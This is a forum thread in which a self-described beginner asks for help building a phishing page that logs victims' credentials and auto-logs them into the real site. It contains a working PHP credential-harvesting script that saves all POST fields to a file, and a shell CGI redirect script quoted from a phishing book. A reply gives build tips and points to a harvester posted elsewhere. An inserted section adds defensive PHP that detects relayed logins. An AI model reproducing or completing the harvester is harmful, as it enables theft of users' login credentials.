
Php script - MITM POST with auto-login


glum


Hello everyone, first of all just wanted to introduce myself, and hope that I can learn from this forum and also contribute to the sharing of knowledge =)

I am trying to learn more about phishers and some of the techniques they use nowadays. And because my PHP is really bad (I'm trying to work on it =P) I was wondering if you could help me with creating a script that not only logs an input text, but also uses that text as a login in the real page.

After some research I learned about the basic fake login script:

<?php
header ('Location: http://failedloginpage');
$handle = fopen("credentials.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Where after logging in you are redirected to the real page with a failed login.

After some more research I found a book called Phishing Exposed where there was this code that allowed to record credentials and use them to send POST to the real website with the user credentials.

#!/bin/sh
PATH=/bin:/usr/bin:/usr/local/bin
RSERVER=bank.securescience.net/bank
URI='echo "${REQUEST_URI}" | sed -e 's@.*/cgi/@/cgi/@''
# Give CGI header and start web page
echo "Status: 301 Moved
Content-Type: text/html
Location: http://${RSERVER}${URI}
<html>
<body>
This page has moved to
<a href=\"http://${RSERVER}${URI}\">http://${RSERVER}${REQUEST_URI}</a>
</body>
</html>"


This code takes the URI in REQUEST_URI and removes everything up to /cgi/ (provided /cgi/ is contained within the URI) and places the results in URI. For example, if REQUEST_URI were http://foo.com/stuff/cgi/Login.cgi, the URI would be /cgi/Login.cgi. Then when a header and HTML are sent to the client's browser, stating that we have a different location, the request will transparently move to http://bank.securescience.net/cgi/Login.cgi

I know this is probably pretty simple, but I am a beginner regarding scripting, so can you please help me make sense of this? What would I need to implement in the first script to be able to do the redirecting?

Thank you =)

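The defender's side of the relay described in this post, added here as an example and not code from the thread or from Phishing Exposed: the real site's login handler can tell a POST relayed by a harvesting page from a genuine browser submission. The origin, the function names and the two sample requests are assumptions.

```php
<?php
// Added example, not code from the thread or the book: checks the real
// site's login handler can apply to tell a POST relayed by a harvesting
// page from a genuine browser submission. Origin, names and the sample
// requests are assumptions.

const EXPECTED_ORIGIN = 'https://bank.example'; // assumed real-site origin

// True when a browser-supplied Origin/Referer points at our own site.
function sourceMatchesOrigin(?string $url): bool
{
    if ($url === null) {
        return false;
    }
    $got = parse_url($url);
    $want = parse_url(EXPECTED_ORIGIN);
    return is_array($got) && isset($got['scheme'], $got['host'])
        && strcasecmp($got['scheme'], $want['scheme']) === 0
        && strcasecmp($got['host'], $want['host']) === 0;
}

// Classify a login POST. $server / $post mirror $_SERVER / $_POST;
// $sessionToken is the anti-CSRF token issued with the login form (null if
// the client has no session cookie, as a server-side relay would not).
function classifyLoginPost(array $server, array $post, ?string $sessionToken): string
{
    // A relay script posts from its own host: no browser Origin/Referer, or
    // one naming the phishing domain rather than ours.
    if (!sourceMatchesOrigin($server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? null)) {
        return 'reject: origin missing or foreign';
    }
    // The harvester never rendered our form, so it cannot supply the token
    // bound to the victim's session; compare in constant time.
    if ($sessionToken === null || !isset($post['csrf'])
        || !hash_equals($sessionToken, (string) $post['csrf'])) {
        return 'reject: missing or mismatched csrf token';
    }
    return 'ok';
}

// Constructed sample requests: a real browser submission and a relayed one.
$genuine = [['HTTP_ORIGIN' => 'https://bank.example'], ['user' => 'a', 'csrf' => 'tok123'], 'tok123'];
$relayed = [['HTTP_USER_AGENT' => 'curl/7.0'], ['user' => 'a', 'pass' => 'b'], null];
foreach (['genuine' => $genuine, 'relayed' => $relayed] as $label => [$srv, $pst, $tok]) {
    // In a real handler, log each rejection with the remote address for SOC review.
    printf("%s: %s\n", $label, classifyLoginPost($srv, $pst, $tok));
}
```

Rejections from a single remote address across many different usernames are the signature of a relay host rather than a user mistyping a password, so they are worth alerting on separately from ordinary failed logins.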

<?php
header ('Location: http://failedloginpage');
$handle = fopen("credentials.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Looking at that code, the first thing it does is move you to another page. Since header location is the first command, the rest of the code is not going to execute (or shouldn't), since you should automatically be moved to the "failedloginpage"; the rest should be ignored.

Basically, if you're collecting credentials, depending on the form used on the site/page, you need a few things here. 1, a log file, which you're good with the credentials.txt. Make sure the file exists first; if not, create it. Then do a check for whether the file exists: if it exists, always append; otherwise, create the file, then write to it.

2, a function that takes the form post or get data from a fake login page, that posts the credentials you want and writes it to the txt file.

Not going to write the whole code for you, but that's just some tips to get you going in the right direction. Search the forums, I helped someone with a credential harvester script for Jasager, that does what you want above, which you can mod and make work for what you are after though. Should be easily adaptable to whatever you want to do with it. I use a version of the same thing for honeypots and fake logins to my own sites and record brute force attempts on my sites.

ie: http://www.attack-scanner.com/brutes/brutes.log

Edited by digip

Thank you for your help digip. Actually, although I only tested it on my own computer, the first script works fine, the credentials are logged and even if the file credentials.txt isn't there it is somehow created by the script.

The problem I was having was with the logging in the real page for the client, besides just redirecting him to the "login failed" page. I will try to find your post then and study it =)

